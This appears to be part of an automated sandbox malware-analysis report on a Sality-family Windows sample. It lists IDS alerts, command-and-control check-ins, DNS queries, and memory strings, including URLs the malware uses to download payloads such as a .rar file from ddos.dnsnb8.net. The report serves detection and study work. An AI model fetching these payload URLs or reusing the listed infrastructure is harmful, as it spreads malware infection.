Source: Traffic Snort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.6:49716 -> 44.221.84.105:80
Source: Traffic Snort IDS: 2037771 ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst 44.221.84.105:80 -> 192.168.2.6:49716
Source: Traffic Snort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.6:49718 -> 78.46.2.155:80
Source: Traffic Snort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.6:49719 -> 37.230.104.89:80
Source: Traffic Snort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.6:49720 -> 54.244.188.177:80
Source: Traffic Snort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.6:49722 -> 44.221.84.105:80
Source: Traffic Snort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.6:49723 -> 44.221.84.105:80
Source: Traffic Snort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.6:49725 -> 78.46.2.155:80
Source: Traffic Snort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.6:49726 -> 37.230.104.89:80
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 799
Source: global traffic TCP traffic: 192.168.2.6:49710 -> 44.221.84.105:799
Source: global traffic UDP traffic: 192.168.2.6:52747 -> 85.17.167.196:9832
Source: Joe Sandbox View IP Address: 44.221.84.105
Source: Joe Sandbox View IP Address: 54.244.188.177
Source: Joe Sandbox View ASN Name: AMAZON-AESUS
Source: Joe Sandbox View ASN Name: HETZNER-ASDE
Source: Joe Sandbox View ASN Name: AMAZON-02US
Source: Joe Sandbox View ASN Name: AEROTEK-ASTR
Source: global traffic HTTP traffic detected:
    GET /cj//k1.rar HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: ddos.dnsnb8.net:799
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /images/xs.jpg?5059c3=10531718 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
    Host: www.careerdesk.org
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    GET /xs.jpg?51fbda=48356010 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
    Host: arthur.niria.biz
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    GET /images/xs.jpg?554c8c=39131092 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
    Host: apple-pie.in
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    GET /xs.jpg?5827cf=5777359 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
    Host: ahmediye.net
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    GET /images/xs2.jpg?6cbf0c=21380388 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
    Host: ampyazilim.com.tr
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    GET /images/xs2.jpg?1 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
    Host: ampyazilim.com.tr
    Cache-Control: no-cache
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /images/xs.jpg?ad5654=34079484 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
    Host: www.careerdesk.org
    Cache-Control: no-cache
    Cookie: snkz=8.46.123.33; btst=23c464339208da2a95574fbd506ebd72|8.46.123.33|1720159204|1720159204|0|1|0
Source: global traffic HTTP traffic detected:
    GET /xs.jpg?c12b4b=126595310 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
    Host: arthur.niria.biz
    Cache-Control: no-cache
    Cookie: snkz=8.46.123.33; btst=f61c3ab837e78a3dbee4d750570963c6|8.46.123.33|1720159205|1720159205|0|1|0
Source: global traffic HTTP traffic detected:
    GET /images/xs.jpg?ce2fff=121614327 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
    Host: apple-pie.in
    Cache-Control: no-cache
    Cookie: btst=a1590c081175a697dce15a514e641dbf|8.46.123.33|1720159206|1720159206|0|1|0; snkz=8.46.123.33
Source: global traffic HTTP traffic detected:
    GET /xs.jpg?e14213=73812575 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
    Host: ahmediye.net
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
    GET /images/xs2.jpg?f4c967=160423430 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
    Host: ampyazilim.com.tr
    Cache-Control: no-cache
Source: unknown UDP traffic detected without corresponding DNS query: 85.17.167.196
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\1.0.0.2.exe Code function: 0_2_02B6B888 InternetOpenA,InternetOpenUrlA,CreateFileA,InternetReadFile,WriteFile,InternetCloseHandle,InternetCloseHandle, 0_2_02B6B888
Source: global traffic DNS traffic detected: DNS query: ddos.dnsnb8.net
Source: global traffic DNS traffic detected: DNS query: althawry.org
Source: global traffic DNS traffic detected: DNS query: www.careerdesk.org
Source: global traffic DNS traffic detected: DNS query: arthur.niria.biz
Source: global traffic DNS traffic detected: DNS query: amsamex.com
Source: global traffic DNS traffic detected: DNS query: apple-pie.in
Source: global traffic DNS traffic detected: DNS query: ahmediye.net
Source: global traffic DNS traffic detected: DNS query: g2.arrowhitech.com
Source: global traffic DNS traffic detected: DNS query: ampyazilim.com.tr
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 06:00:07 GMTServer: ApacheContent-Length: 258Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 05 Jul 2024 06:00:11 GMTServer: ApacheContent-Length: 258Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>
Source: rksowY.exe, 00000002.00000003.2147302621.00000000007F0000.00000004.00001000.00020000.00000000.sdmp, rksowY.exe, 00000002.00000002.2236498849.00000000005B3000.00000002.00000001.01000000.00000005.sdmp String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
Source: 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000401000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://127.0.0.1/R2_2021/ServerInfo.json
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://173.193.19.14/logo.gif
Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://89.119.67.154/testo5/
Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://89.119.67.154/testo5/http://kukutrustnet777.info/home.gifhttp://kukutrustnet888.info/home.gif
Source: 1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://a3inforservice.com.br/images/logof.gif
Source: 1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://accnet.ca/xs.jpg
Source: 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://accnet.ca/xs.jpghttp://a3inforservice.com.br/images/logof.gif
Source: 1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://ahmediye.net/xs.jpg
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ahmediye.net/xs.jpg?5827cf=5777359
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ahmediye.net/xs.jpg?5827cf=5777359V
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2255038602.0000000007591000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.00000000075F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ahmediye.net/xs.jpg?e14213=73812575
Source: 1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://althawry.org/images/xs.jpg
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000108E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://althawry.org/images/xs.jpg?4f8fad=26070625
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000108E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://althawry.org/images/xs.jpg?4f8fad=260706254
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000108E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://althawry.org/images/xs.jpg?4f8fad=26070625d
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://althawry.org/images/xs.jpg?a6d450=65599968
Source: 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://althawry.org/images/xs.jpghttp://www.careerdesk.org/images/xs.jpghttp://arthur.niria.biz/xs.j
Source: 1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg
Source: 1.0.0.2.exe, 00000000.00000003.2255038602.000000000760A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.000000000760A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?1
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?1.
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000111D000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.000000000108E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?6cbf0c=21380388
Source: 1.0.0.2.exe, 00000000.00000002.2273488135.000000000761C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430
Source: 1.0.0.2.exe, 00000000.00000003.2255294960.000000000761C000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.000000000761C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430M
Source: 1.0.0.2.exe, 00000000.00000002.2273488135.00000000075F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430ed
Source: 1.0.0.2.exe, 00000000.00000003.2255038602.0000000007591000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.00000000075F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430ed;0
Source: 1.0.0.2.exe, 00000000.00000003.2255038602.0000000007591000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.00000000075F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430edK2
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000115D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430ellNoRoam
Source: 1.0.0.2.exe, 00000000.00000003.2255294960.000000000761C000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.000000000761C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430j
Source: 1.0.0.2.exe, 00000000.00000003.2255294960.000000000761C000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2273488135.000000000761C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ampyazilim.com.tr/images/xs2.jpg?f4c967=160423430x
Source: 1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://amsamex.com/xs.jpg
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://amsamex.com/xs.jpg?549590=27716560
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://amsamex.com/xs.jpg?ce2fff=94588921
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://amsamex.com/xs.jpg?ce2fff=945889216
Source: 1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://apple-pie.in/images/xs.jpg
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apple-pie.in/images/xs.jpg?554c8c=39131092
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.0000000001144000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apple-pie.in/images/xs.jpg?ce2fff=121614327
Source: 1.0.0.2.exe, 1.0.0.2.exe, 00000000.00000003.2146823499.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B48000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2272713358.0000000005763000.00000004.10000000.00040000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000003.2146599123.00000000010B4000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2264312389.0000000000D53000.00000040.00000001.01000000.00000003.sdmp, 1.0.0.2.exe, 00000000.00000002.2266264482.0000000002B4E000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2267379038.00000000040EB000.00000004.00000010.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2265887991.00000000010E7000.00000004.00000020.00020000.00000000.sdmp, 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BD5000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://arthur.niria.biz/xs.jpg
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000115D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://arthur.niria.biz/xs.jpg?51fbda=48356010
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000115D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://arthur.niria.biz/xs.jpg?51fbda=483560101
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000115D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://arthur.niria.biz/xs.jpg?51fbda=48356010a
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000115D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://arthur.niria.biz/xs.jpg?c12b4b=126595310
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000115D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://arthur.niria.biz/xs.jpg?c12b4b=126595310C
Source: 1.0.0.2.exe, 00000000.00000002.2265887991.000000000115D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://arthur.niria.biz/xs.jpg?c12b4b=126595310T
Source: rksowY.exe, 00000002.00000003.2179982958.0000000000B6D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net/
Source: rksowY.exe, 00000002.00000002.2255119471.00000000028CA000.00000004.00000010.00020000.00000000.sdmp, rksowY.exe, 00000002.00000003.2178512612.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, rksowY.exe, 00000002.00000002.2243579607.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, rksowY.exe, 00000002.00000002.2243579607.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
Source: rksowY.exe, 00000002.00000002.2243579607.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar4
Source: rksowY.exe, 00000002.00000003.2178512612.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar6
Source: rksowY.exe, 00000002.00000002.2243579607.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar9
Source: rksowY.exe, 00000002.00000003.2178512612.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarL
Source: rksowY.exe, 00000002.00000002.2255119471.00000000028CA000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarp
Source: rksowY.exe, 00000002.00000003.2178512612.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, rksowY.exe, 00000002.00000002.2243579607.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rars
